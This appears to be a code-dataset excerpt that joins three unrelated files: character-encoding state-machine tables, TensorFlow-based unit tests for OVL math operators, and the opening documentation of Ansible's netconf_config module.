    2,2,2,2,2,2,2,2, # 68 - 6f
    2,2,2,2,2,2,2,2, # 70 - 77
    2,2,2,2,2,2,2,4, # 78 - 7f
    5,6,6,6,6,6,6,6, # 80 - 87
    6,6,6,6,6,6,6,6, # 88 - 8f
    6,6,6,6,6,6,6,6, # 90 - 97
    6,6,6,6,6,6,6,6, # 98 - 9f
    6,6,6,6,6,6,6,6, # a0 - a7
    6,6,6,6,6,6,6,6, # a8 - af
    6,6,6,6,6,6,6,6, # b0 - b7
    6,6,6,6,6,6,6,6, # b8 - bf
    6,6,6,6,6,6,6,6, # c0 - c7
    6,6,6,6,6,6,6,6, # c8 - cf
    6,6,6,6,6,6,6,6, # d0 - d7
    6,6,6,6,6,6,6,6, # d8 - df
    6,6,6,6,6,6,6,6, # e0 - e7
    6,6,6,6,6,6,6,6, # e8 - ef
    6,6,6,6,6,6,6,6, # f0 - f7
    6,6,6,6,6,6,6,0 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
GB2312_st = (
    eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
    eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
    4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
    eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
    eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
# Packaged model: class map, class count, state table, char lengths, name.
GB2312SMModel = {'classTable': GB2312_cls,
                 'classFactor': 7,
                 'stateTable': GB2312_st,
                 'charLenTable': GB2312CharLenTable,
                 'name': 'GB2312'}
# Shift_JIS
# Maps each input byte value (0x00-0xff) to a character class index.
SJIS_cls = (
    1,1,1,1,1,1,1,1, # 00 - 07
    1,1,1,1,1,1,0,0, # 08 - 0f
    1,1,1,1,1,1,1,1, # 10 - 17
    1,1,1,0,1,1,1,1, # 18 - 1f
    1,1,1,1,1,1,1,1, # 20 - 27
    1,1,1,1,1,1,1,1, # 28 - 2f
    1,1,1,1,1,1,1,1, # 30 - 37
    1,1,1,1,1,1,1,1, # 38 - 3f
    2,2,2,2,2,2,2,2, # 40 - 47
    2,2,2,2,2,2,2,2, # 48 - 4f
    2,2,2,2,2,2,2,2, # 50 - 57
    2,2,2,2,2,2,2,2, # 58 - 5f
    2,2,2,2,2,2,2,2, # 60 - 67
    2,2,2,2,2,2,2,2, # 68 - 6f
    2,2,2,2,2,2,2,2, # 70 - 77
    2,2,2,2,2,2,2,1, # 78 - 7f
    3,3,3,3,3,2,2,3, # 80 - 87
    3,3,3,3,3,3,3,3, # 88 - 8f
    3,3,3,3,3,3,3,3, # 90 - 97
    3,3,3,3,3,3,3,3, # 98 - 9f
    #0xa0 is illegal in sjis encoding, but some pages does
    #contain such byte. We need to be more error forgiven.
    2,2,2,2,2,2,2,2, # a0 - a7
    2,2,2,2,2,2,2,2, # a8 - af
    2,2,2,2,2,2,2,2, # b0 - b7
    2,2,2,2,2,2,2,2, # b8 - bf
    2,2,2,2,2,2,2,2, # c0 - c7
    2,2,2,2,2,2,2,2, # c8 - cf
    2,2,2,2,2,2,2,2, # d0 - d7
    2,2,2,2,2,2,2,2, # d8 - df
    3,3,3,3,3,3,3,3, # e0 - e7
    3,3,3,3,3,4,4,4, # e8 - ef
    3,3,3,3,3,3,3,3, # f0 - f7
    3,3,3,3,3,0,0,0) # f8 - ff
# State-transition table: next state for each (state, byte class) pair.
SJIS_st = (
    eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
    eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
# Byte length of a complete character beginning with each class (0 = n/a).
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
# Packaged model: class map, class count, state table, char lengths, name.
SJISSMModel = {'classTable': SJIS_cls,
               'classFactor': 6,
               'stateTable': SJIS_st,
               'charLenTable': SJISCharLenTable,
               'name': 'Shift_JIS'}
# UCS2-BE
# Maps each input byte value (0x00-0xff) to a character class index.
UCS2BE_cls = (
    0,0,0,0,0,0,0,0, # 00 - 07
    0,0,1,0,0,2,0,0, # 08 - 0f
    0,0,0,0,0,0,0,0, # 10 - 17
    0,0,0,3,0,0,0,0, # 18 - 1f
    0,0,0,0,0,0,0,0, # 20 - 27
    0,3,3,3,3,3,0,0, # 28 - 2f
    0,0,0,0,0,0,0,0, # 30 - 37
    0,0,0,0,0,0,0,0, # 38 - 3f
    0,0,0,0,0,0,0,0, # 40 - 47
    0,0,0,0,0,0,0,0, # 48 - 4f
    0,0,0,0,0,0,0,0, # 50 - 57
    0,0,0,0,0,0,0,0, # 58 - 5f
    0,0,0,0,0,0,0,0, # 60 - 67
    0,0,0,0,0,0,0,0, # 68 - 6f
    0,0,0,0,0,0,0,0, # 70 - 77
    0,0,0,0,0,0,0,0, # 78 - 7f
    0,0,0,0,0,0,0,0, # 80 - 87
    0,0,0,0,0,0,0,0, # 88 - 8f
    0,0,0,0,0,0,0,0, # 90 - 97
    0,0,0,0,0,0,0,0, # 98 - 9f
    0,0,0,0,0,0,0,0, # a0 - a7
    0,0,0,0,0,0,0,0, # a8 - af
    0,0,0,0,0,0,0,0, # b0 - b7
    0,0,0,0,0,0,0,0, # b8 - bf
    0,0,0,0,0,0,0,0, # c0 - c7
    0,0,0,0,0,0,0,0, # c8 - cf
    0,0,0,0,0,0,0,0, # d0 - d7
    0,0,0,0,0,0,0,0, # d8 - df
    0,0,0,0,0,0,0,0, # e0 - e7
    0,0,0,0,0,0,0,0, # e8 - ef
    0,0,0,0,0,0,0,0, # f0 - f7
    0,0,0,0,0,0,4,5 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
UCS2BE_st = (
    5, 7, 7,eError, 4, 3,eError,eError,#00-07
    eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
    6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
    6, 6, 6, 6, 5, 7, 7,eError,#20-27
    5, 8, 6, 6,eError, 6, 6, 6,#28-2f
    6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
# Byte length of a complete character beginning with each class (0 = n/a).
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
# Packaged model: class map, class count, state table, char lengths, name.
UCS2BESMModel = {'classTable': UCS2BE_cls,
                 'classFactor': 6,
                 'stateTable': UCS2BE_st,
                 'charLenTable': UCS2BECharLenTable,
                 'name': 'UTF-16BE'}
# UCS2-LE
# Maps each input byte value (0x00-0xff) to a character class index.
UCS2LE_cls = (
    0,0,0,0,0,0,0,0, # 00 - 07
    0,0,1,0,0,2,0,0, # 08 - 0f
    0,0,0,0,0,0,0,0, # 10 - 17
    0,0,0,3,0,0,0,0, # 18 - 1f
    0,0,0,0,0,0,0,0, # 20 - 27
    0,3,3,3,3,3,0,0, # 28 - 2f
    0,0,0,0,0,0,0,0, # 30 - 37
    0,0,0,0,0,0,0,0, # 38 - 3f
    0,0,0,0,0,0,0,0, # 40 - 47
    0,0,0,0,0,0,0,0, # 48 - 4f
    0,0,0,0,0,0,0,0, # 50 - 57
    0,0,0,0,0,0,0,0, # 58 - 5f
    0,0,0,0,0,0,0,0, # 60 - 67
    0,0,0,0,0,0,0,0, # 68 - 6f
    0,0,0,0,0,0,0,0, # 70 - 77
    0,0,0,0,0,0,0,0, # 78 - 7f
    0,0,0,0,0,0,0,0, # 80 - 87
    0,0,0,0,0,0,0,0, # 88 - 8f
    0,0,0,0,0,0,0,0, # 90 - 97
    0,0,0,0,0,0,0,0, # 98 - 9f
    0,0,0,0,0,0,0,0, # a0 - a7
    0,0,0,0,0,0,0,0, # a8 - af
    0,0,0,0,0,0,0,0, # b0 - b7
    0,0,0,0,0,0,0,0, # b8 - bf
    0,0,0,0,0,0,0,0, # c0 - c7
    0,0,0,0,0,0,0,0, # c8 - cf
    0,0,0,0,0,0,0,0, # d0 - d7
    0,0,0,0,0,0,0,0, # d8 - df
    0,0,0,0,0,0,0,0, # e0 - e7
    0,0,0,0,0,0,0,0, # e8 - ef
    0,0,0,0,0,0,0,0, # f0 - f7
    0,0,0,0,0,0,4,5 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
UCS2LE_st = (
    6, 6, 7, 6, 4, 3,eError,eError,#00-07
    eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
    5, 5, 5,eError, 5,eError, 6, 6,#18-1f
    7, 6, 8, 8, 5, 5, 5,eError,#20-27
    5, 5, 5,eError,eError,eError, 5, 5,#28-2f
    5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
# Byte length of a complete character beginning with each class.
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
# Packaged model: class map, class count, state table, char lengths, name.
UCS2LESMModel = {'classTable': UCS2LE_cls,
                 'classFactor': 6,
                 'stateTable': UCS2LE_st,
                 'charLenTable': UCS2LECharLenTable,
                 'name': 'UTF-16LE'}
# UTF-8
# Maps each input byte value (0x00-0xff) to a character class index.
UTF8_cls = (
    1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
    1,1,1,1,1,1,0,0, # 08 - 0f
    1,1,1,1,1,1,1,1, # 10 - 17
    1,1,1,0,1,1,1,1, # 18 - 1f
    1,1,1,1,1,1,1,1, # 20 - 27
    1,1,1,1,1,1,1,1, # 28 - 2f
    1,1,1,1,1,1,1,1, # 30 - 37
    1,1,1,1,1,1,1,1, # 38 - 3f
    1,1,1,1,1,1,1,1, # 40 - 47
    1,1,1,1,1,1,1,1, # 48 - 4f
    1,1,1,1,1,1,1,1, # 50 - 57
    1,1,1,1,1,1,1,1, # 58 - 5f
    1,1,1,1,1,1,1,1, # 60 - 67
    1,1,1,1,1,1,1,1, # 68 - 6f
    1,1,1,1,1,1,1,1, # 70 - 77
    1,1,1,1,1,1,1,1, # 78 - 7f
    2,2,2,2,3,3,3,3, # 80 - 87
    4,4,4,4,4,4,4,4, # 88 - 8f
    4,4,4,4,4,4,4,4, # 90 - 97
    4,4,4,4,4,4,4,4, # 98 - 9f
    5,5,5,5,5,5,5,5, # a0 - a7
    5,5,5,5,5,5,5,5, # a8 - af
    5,5,5,5,5,5,5,5, # b0 - b7
    5,5,5,5,5,5,5,5, # b8 - bf
    0,0,6,6,6,6,6,6, # c0 - c7
    6,6,6,6,6,6,6,6, # c8 - cf
    6,6,6,6,6,6,6,6, # d0 - d7
    6,6,6,6,6,6,6,6, # d8 - df
    7,8,8,8,8,8,8,8, # e0 - e7
    8,8,8,8,8,9,8,8, # e8 - ef
    10,11,11,11,11,11,11,11, # f0 - f7
    12,13,13,13,14,15,0,0 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
UTF8_st = (
    eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
    9, 11, 8, 7, 6, 5, 4, 3,#08-0f
    eError,eError,eError,eError,eError,eError,eError,eError,#10-17
    eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
    eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
    eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
    eError,eError, 5, 5, 5, 5,eError,eError,#30-37
    eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
    eError,eError,eError, 5, 5, 5,eError,eError,#40-47
    eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
    eError,eError, 7, 7, 7, 7,eError,eError,#50-57
    eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
    eError,eError,eError,eError, 7, 7,eError,eError,#60-67
    eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
    eError,eError, 9, 9, 9, 9,eError,eError,#70-77
    eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
    eError,eError,eError,eError,eError, 9,eError,eError,#80-87
    eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
    eError,eError, 12, 12, 12, 12,eError,eError,#90-97
    eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
    eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
    eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
    eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
    eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
    eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
    eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
# Byte length of a complete character beginning with each class (0 = n/a).
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)
# Packaged model: class map, class count, state table, char lengths, name.
UTF8SMModel = {'classTable': UTF8_cls,
               'classFactor': 16,
               'stateTable': UTF8_st,
               'charLenTable': UTF8CharLenTable,
               'name': 'UTF-8'}
| mit |
# Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
import unittest
import numpy as np
import tensorflow as tf
from ..operator import operator, evaluate, as_tensorflow
from ..expression import position_in, output_like
from ..local import clear_op_cache
from .math import add, sub, mul, div, neg, tanh, sin, cos, tan, sigmoid, split, concat
class TestMath(unittest.TestCase):
    """Regression tests for the OVL standard math ops.

    Each test builds the same computation with OVL operators and with a
    reference implementation (NumPy or TensorFlow) and compares values and,
    where applicable, gradients.
    """
    # Runs once at class-definition time so every test compiles its operators
    # from a clean cache.
    clear_op_cache()
    def test_binary_infix(self):
        """
        Make sure all binary infix operators yield the same result as numpy
        """
        @operator()
        def no_op(x):
            out = output_like(x)
            pos = position_in(x.shape)
            out[pos] = x[pos]
            return out
        def test_infix(lhs, rhs):
            # Wrap the lhs in an identity op so infix operators dispatch to OVL.
            ovl0 = no_op(lhs)
            def test_np(fcn):
                ovl_l = fcn(ovl0, rhs)
                ovl_r = fcn(rhs, ovl0)
                ovl_l, ovl_r = evaluate([ovl_l, ovl_r])
                np_l = fcn(lhs, rhs)
                np_r = fcn(rhs, lhs)
                assert np.all(np.equal(ovl_l, np_l))
                assert np.all(np.equal(ovl_r, np_r))
            test_np(lambda x, y: x + y)
            test_np(lambda x, y: x - y)
            test_np(lambda x, y: x * y)
            test_np(lambda x, y: x / y)
            test_np(lambda x, y: x == y)
            test_np(lambda x, y: x != y)
            test_np(lambda x, y: x < y)
            test_np(lambda x, y: x <= y)
            test_np(lambda x, y: x > y)
            test_np(lambda x, y: x >= y)
            # OVL uses c-style fmod, not python style mod, so use numpy fmod function for test
            # see : http://docs.scipy.org/doc/numpy/reference/generated/numpy.fmod.html
            ovl_left, ovl_right = evaluate([ovl0 % rhs, rhs % ovl0])
            np_left = np.fmod(lhs, rhs)
            np_right = np.fmod(rhs, lhs)
            assert np.all(np.equal(ovl_left, np_left))
            assert np.all(np.equal(ovl_right, np_right))
            ovl_neg = evaluate([-ovl0])
            assert np.all(np.equal(ovl_neg, -lhs))
        np0 = np.random.random(100).reshape((10, 10))
        np1 = np0 + np.random.randint(-1, 2, size=100).reshape((10, 10))
        # test all binary infix operators
        test_infix(np0, np1)
        # test broadcasting from a scalar on rhs
        test_infix(np0, np.random.random(1))
        # test broadcasting from a scalar on lhs
        test_infix(np.random.random(1), np0)
        # attempting to negate an unsigned tensor should raise a type error
        uint = np.random.randint(0, 10, size=10).astype(np.uint8)
        try:
            -no_op(uint)
        except TypeError:
            pass
        else:
            raise AssertionError
    def test_cwise_binary_grad(self):
        """
        Ensure that all component-wise binary functions in the math op library yield an identical gradient to tensorflow
        """
        test_config = tf.ConfigProto(allow_soft_placement=False)
        # Disable graph optimization so the comparison is against unfused ops.
        test_config.graph_options.optimizer_options.opt_level = -1
        with tf.Session(config=test_config) as s:
            lhs_np = np.random.random(100)
            rhs_np = lhs_np + np.random.randint(-1, 2, size=100)
            grad_above = tf.constant(np.random.random(100))
            lhs = tf.constant(lhs_np)
            rhs = tf.constant(rhs_np)
            def test_grad(fcn, tf_fcn):
                ovl_l = fcn(lhs, rhs)
                ovl_r = fcn(rhs, lhs)
                ovl_l, ovl_r = as_tensorflow([ovl_l, ovl_r])
                tf_l = tf_fcn(lhs, rhs)
                tf_r = tf_fcn(rhs, lhs)
                tf_grad_l, tf_grad_r = tf.gradients(tf_l, [lhs, rhs], grad_above)
                ovl_grad_l, ovl_grad_r = tf.gradients(ovl_l, [lhs, rhs], grad_above)
                ovl_l, ovl_r, tf_l, tf_r, tf_grad_l, tf_grad_r, ovl_grad_l, ovl_grad_r = s.run([
                    ovl_l, ovl_r, tf_l, tf_r, tf_grad_l, tf_grad_r, ovl_grad_l, ovl_grad_r])
                assert np.all(np.equal(ovl_l, tf_l))
                assert np.all(np.equal(ovl_r, tf_r))
                assert np.all(np.equal(tf_grad_l, ovl_grad_l))
                assert np.all(np.equal(tf_grad_r, ovl_grad_r))
            test_grad(lambda x, y: add(x, y), lambda x, y: tf.add(x, y))
            test_grad(lambda x, y: sub(x, y), lambda x, y: tf.sub(x, y))
            test_grad(lambda x, y: mul(x, y), lambda x, y: tf.mul(x, y))
            test_grad(lambda x, y: div(x, y), lambda x, y: tf.div(x, y))
    def test_cwise_unary_grad(self):
        """
        Ensure that all component-wise unary functions in the math op library yield an identical gradient to tensorflow
        """
        test_config = tf.ConfigProto(allow_soft_placement=False)
        test_config.graph_options.optimizer_options.opt_level = -1
        with tf.Session(config=test_config) as s:
            arg_np = np.random.random(100)
            grad_above = tf.constant(np.random.random(100))
            arg = tf.constant(arg_np)
            def test_grad(fcn, tf_fcn):
                ovl_out = as_tensorflow(fcn(arg))
                tf_out = tf_fcn(arg)
                ovl_grad = tf.gradients(ovl_out, arg, grad_above)[0]
                tf_grad = tf.gradients(tf_out, arg, grad_above)[0]
                ovl_out, tf_out, ovl_grad, tf_grad = s.run([ovl_out, tf_out, ovl_grad, tf_grad])
                # allclose (not equal): transcendental implementations may
                # differ by rounding between OVL and TF kernels.
                assert np.allclose(ovl_out, tf_out)
                assert np.allclose(ovl_grad, tf_grad)
            test_grad(lambda x: neg(x), lambda x: tf.neg(x))
            test_grad(lambda x: tanh(x), lambda x: tf.tanh(x))
            test_grad(lambda x: sin(x), lambda x: tf.sin(x))
            test_grad(lambda x: cos(x), lambda x: tf.cos(x))
            test_grad(lambda x: tan(x), lambda x: tf.tan(x))
            test_grad(lambda x: sigmoid(x), lambda x: tf.sigmoid(x))
    def test_concat(self):
        """Compare OVL concat values and gradients against tf.concat for 1-4D inputs."""
        test_config = tf.ConfigProto(allow_soft_placement=False)
        test_config.graph_options.optimizer_options.opt_level = -1
        with tf.Session(config=test_config) as s:
            num_concat = 5
            args_1d = []
            args_2d = []
            args_3d = []
            args_4d = []
            for n in range(num_concat):
                args_1d.append(tf.constant(np.random.random(10//num_concat).reshape((10//num_concat))))
                args_2d.append(tf.constant(np.random.random(100//num_concat).reshape((10, 10//num_concat))))
                args_3d.append(tf.constant(np.random.random(1000//num_concat).reshape((10, 10, 10//num_concat))))
                args_4d.append(tf.constant(np.random.random(10000//num_concat).reshape((10, 10, 10, 10//num_concat))))
            tf_1d = tf.concat(0, args_1d)
            tf_2d = tf.concat(1, args_2d)
            tf_3d = tf.concat(2, args_3d)
            tf_4d = tf.concat(3, args_4d)
            ovl_1d = as_tensorflow(concat(*args_1d, concat_dim=0))
            ovl_2d = as_tensorflow(concat(*args_2d, concat_dim=1))
            ovl_3d = as_tensorflow(concat(*args_3d, concat_dim=2))
            ovl_4d = as_tensorflow(concat(*args_4d, concat_dim=3))
            assert np.all(np.equal(*s.run([tf_1d, ovl_1d])))
            assert np.all(np.equal(*s.run([tf_2d, ovl_2d])))
            assert np.all(np.equal(*s.run([tf_3d, ovl_3d])))
            assert np.all(np.equal(*s.run([tf_4d, ovl_4d])))
            grad_above_1d = tf.constant(np.random.random(10))
            grad_above_2d = tf.constant(np.random.random(100).reshape((10, 10)))
            grad_above_3d = tf.constant(np.random.random(1000).reshape((10, 10, 10)))
            grad_above_4d = tf.constant(np.random.random(10000).reshape((10, 10, 10, 10)))
            tf_grads_1d = tf.gradients(tf_1d, args_1d, grad_above_1d)
            tf_grads_2d = tf.gradients(tf_2d, args_2d, grad_above_2d)
            tf_grads_3d = tf.gradients(tf_3d, args_3d, grad_above_3d)
            tf_grads_4d = tf.gradients(tf_4d, args_4d, grad_above_4d)
            ovl_grads_1d = tf.gradients(ovl_1d, args_1d, grad_above_1d)
            ovl_grads_2d = tf.gradients(ovl_2d, args_2d, grad_above_2d)
            ovl_grads_3d = tf.gradients(ovl_3d, args_3d, grad_above_3d)
            ovl_grads_4d = tf.gradients(ovl_4d, args_4d, grad_above_4d)
            for grad_index in range(num_concat):
                assert np.all(np.equal(*s.run([tf_grads_1d[grad_index], ovl_grads_1d[grad_index]])))
                assert np.all(np.equal(*s.run([tf_grads_2d[grad_index], ovl_grads_2d[grad_index]])))
                assert np.all(np.equal(*s.run([tf_grads_3d[grad_index], ovl_grads_3d[grad_index]])))
                assert np.all(np.equal(*s.run([tf_grads_4d[grad_index], ovl_grads_4d[grad_index]])))
            # concatenate irregularly sized arrays
            arg_irr1 = tf.constant(np.random.random(10*5).reshape(10, 5))
            arg_irr2 = tf.constant(np.random.random(10*7).reshape(10, 7))
            tf_irr = tf.concat(1, [arg_irr1, arg_irr2])
            ovl_irr = as_tensorflow(concat(arg_irr1, arg_irr2, concat_dim=1))
            assert np.all(np.equal(*s.run([tf_irr, ovl_irr])))
    def test_split(self):
        """Compare OVL split values and gradients against tf.split for 1-4D inputs."""
        test_config = tf.ConfigProto(allow_soft_placement=False)
        test_config.graph_options.optimizer_options.opt_level = -1
        with tf.Session(config=test_config) as s:
            arg_1d = tf.constant(np.random.random(10))
            arg_2d = tf.constant(np.random.random(100).reshape((10, 10)))
            arg_3d = tf.constant(np.random.random(1000).reshape((10, 10, 10)))
            arg_4d = tf.constant(np.random.random(10000).reshape((10, 10, 10, 10)))
            num_split = 5
            ovl_1d = as_tensorflow(split(arg_1d, split_dim=0, num_split=num_split))
            ovl_2d = as_tensorflow(split(arg_2d, split_dim=1, num_split=num_split))
            ovl_3d = as_tensorflow(split(arg_3d, split_dim=2, num_split=num_split))
            ovl_4d = as_tensorflow(split(arg_4d, split_dim=3, num_split=num_split))
            tf_1d = tf.split(0, num_split, arg_1d)
            tf_2d = tf.split(1, num_split, arg_2d)
            tf_3d = tf.split(2, num_split, arg_3d)
            tf_4d = tf.split(3, num_split, arg_4d)
            for n in range(num_split):
                assert np.all(np.equal(*s.run([ovl_1d[n], tf_1d[n]])))
                assert np.all(np.equal(*s.run([ovl_2d[n], tf_2d[n]])))
                assert np.all(np.equal(*s.run([ovl_3d[n], tf_3d[n]])))
                assert np.all(np.equal(*s.run([ovl_4d[n], tf_4d[n]])))
            grads_above_1d = []
            grads_above_2d = []
            grads_above_3d = []
            grads_above_4d = []
            for n in range(num_split):
                grads_above_1d.append(tf.constant(np.random.random(10//num_split).reshape((10//num_split))))
                grads_above_2d.append(tf.constant(np.random.random(100//num_split).reshape((10, 10//num_split))))
                grads_above_3d.append(tf.constant(np.random.random(1000//num_split).reshape((10, 10, 10//num_split))))
                grads_above_4d.append(tf.constant(np.random.random(10000//num_split).
                                                  reshape((10, 10, 10, 10//num_split))))
            tf_grad_1d = tf.gradients(tf_1d, arg_1d, grads_above_1d)[0]
            ovl_grad_1d = tf.gradients(ovl_1d, arg_1d, grads_above_1d)[0]
            assert np.all(np.equal(*s.run([tf_grad_1d, ovl_grad_1d])))
            tf_grad_2d = tf.gradients(tf_2d, arg_2d, grads_above_2d)[0]
            ovl_grad_2d = tf.gradients(ovl_2d, arg_2d, grads_above_2d)[0]
            assert np.all(np.equal(*s.run([tf_grad_2d, ovl_grad_2d])))
            tf_grad_3d = tf.gradients(tf_3d, arg_3d, grads_above_3d)[0]
            ovl_grad_3d = tf.gradients(ovl_3d, arg_3d, grads_above_3d)[0]
            assert np.all(np.equal(*s.run([tf_grad_3d, ovl_grad_3d])))
            tf_grad_4d = tf.gradients(tf_4d, arg_4d, grads_above_4d)[0]
            ovl_grad_4d = tf.gradients(ovl_4d, arg_4d, grads_above_4d)[0]
            assert np.all(np.equal(*s.run([tf_grad_4d, ovl_grad_4d])))
    def test_lstm(self):
        """Check an LSTM cell body built from OVL ops against the TensorFlow
        equivalent, for values and gradients, at loose (1e-2) tolerance."""
        batches = 200
        vec_len = 500
        forget = 0.0
        test_config = tf.ConfigProto(allow_soft_placement=False)
        test_config.graph_options.optimizer_options.opt_level = -1
        with tf.Session(config=test_config) as s:
            concat_arg = tf.constant(np.random.normal(size=batches*4*vec_len).reshape((batches, 4*vec_len)))
            c = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
            i, j, f, o = tf.split(1, 4, concat_arg)
            new_c_tf = tf.mul(c, tf.sigmoid(f + forget)) + tf.sigmoid(i) * tf.tanh(j)
            new_h_tf = tf.tanh(new_c_tf) * tf.sigmoid(o)
            i, j, f, o = split(concat_arg, split_dim=1, num_split=4)
            new_c = mul(c, sigmoid(f)) + sigmoid(i) * tanh(j)
            new_h = tanh(new_c) * sigmoid(o)
            new_c_ovl, new_h_ovl = as_tensorflow([new_c, new_h])
            assert np.allclose(*s.run([new_c_tf, new_c_ovl]), rtol=1e-2)
            assert np.allclose(*s.run([new_h_tf, new_h_ovl]), rtol=1e-2)
            c_grad = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
            h_grad = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
            # gradients must be manually summed for tf version - why?
            dnc_dc, dnc_dcat = tf.gradients([new_c_tf], [c, concat_arg], [c_grad])
            dnh_dc, dnh_dcat = tf.gradients([new_h_tf], [c, concat_arg], [h_grad])
            c_grad_tf, concat_grad_tf = dnc_dc+dnh_dc, dnc_dcat+dnh_dcat
            c_grad_ovl, concat_grad_ovl = tf.gradients([new_h_ovl, new_c_ovl], [c, concat_arg], [h_grad, c_grad])
            assert np.allclose(*s.run([concat_grad_tf, concat_grad_ovl]), rtol=1e-2)
            assert np.allclose(*s.run([c_grad_tf, c_grad_ovl]), rtol=1e-2)
| apache-2.0 |
Dhivyap/ansible | lib/ansible/modules/network/netconf/netconf_config.py | 6 | 19384 | #!/usr/bin/python
# (c) 2016, Leandro Lisboa Penz <lpenz at lpenz.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: netconf_config
version_added: "2.2"
author: "Leandro Lisboa Penz (@lpenz)"
short_description: netconf device configuration
description:
- Netconf is a network management protocol developed and standardized by
the IETF. It is documented in RFC 6241.
- This module allows the user to send a configuration XML file to a netconf
device, and detects if there was a configuration change.
extends_documentation_fragment:
- netconf
- network_agnostic
options:
content:
description:
- The configuration data as defined by the device's data models, the value can be either in
xml string format or text format. The format of the configuration should be supported by remote
Netconf server
aliases: ['xml']
target:
description:
Name of the configuration datastore to be edited.
- auto, uses candidate and fallback to running
- candidate, edit <candidate/> datastore and then commit
- running, edit <running/> datastore directly
default: auto
version_added: "2.4"
aliases: ['datastore']
source_datastore:
description:
- Name of the configuration datastore to use as the source to copy the configuration
to the datastore mentioned by C(target) option. The values can be either I(running), I(candidate),
I(startup) or a remote URL
version_added: "2.7"
aliases: ['source']
format:
description:
- The format of the configuration provided as value of C(content). Accepted values are I(xml) and I(text) and
the given configuration format should be supported by remote Netconf server.
default: xml
choices: ['xml', 'text']
version_added: "2.7"
lock:
description:
- Instructs the module to explicitly lock the datastore specified as C(target). By setting the option
value I(always) is will explicitly lock the datastore mentioned in C(target) option. It the value
is I(never) it will not lock the C(target) datastore. The value I(if-supported) lock the C(target)
datastore only if it is supported by the remote Netconf server.
default: always
choices: ['never', 'always', 'if-supported']
version_added: "2.7"
default_operation:
description:
- The default operation for <edit-config> rpc, valid values are I(merge), I(replace) and I(none).
If the default value is merge, the configuration data in the C(content) option is merged at the
corresponding level in the C(target) datastore. If the value is replace the data in the C(content)
option completely replaces the configuration in the C(target) datastore. If the value is none the C(target)
datastore is unaffected by the configuration in the config option, unless and until the incoming configuration
data uses the C(operation) operation to request a different operation.
choices: ['merge', 'replace', 'none']
version_added: "2.7"
confirm:
description:
- This argument will configure a timeout value for the commit to be confirmed before it is automatically
rolled back. If the C(confirm_commit) argument is set to False, this argument is silently ignored. If the
value of this argument is set to 0, the commit is confirmed immediately. The remote host MUST
support :candidate and :confirmed-commit capability for this option to .
default: 0
version_added: "2.7"
confirm_commit:
description:
- This argument will execute commit operation on remote device. It can be used to confirm a previous commit.
type: bool
default: 'no'
version_added: "2.7"
error_option:
description:
- This option controls the netconf server action after an error occurs while editing the configuration.
- If I(error_option=stop-on-error), abort the config edit on first error.
- If I(error_option=continue-on-error), continue to process configuration data on error.
The error is recorded and negative response is generated if any errors occur.
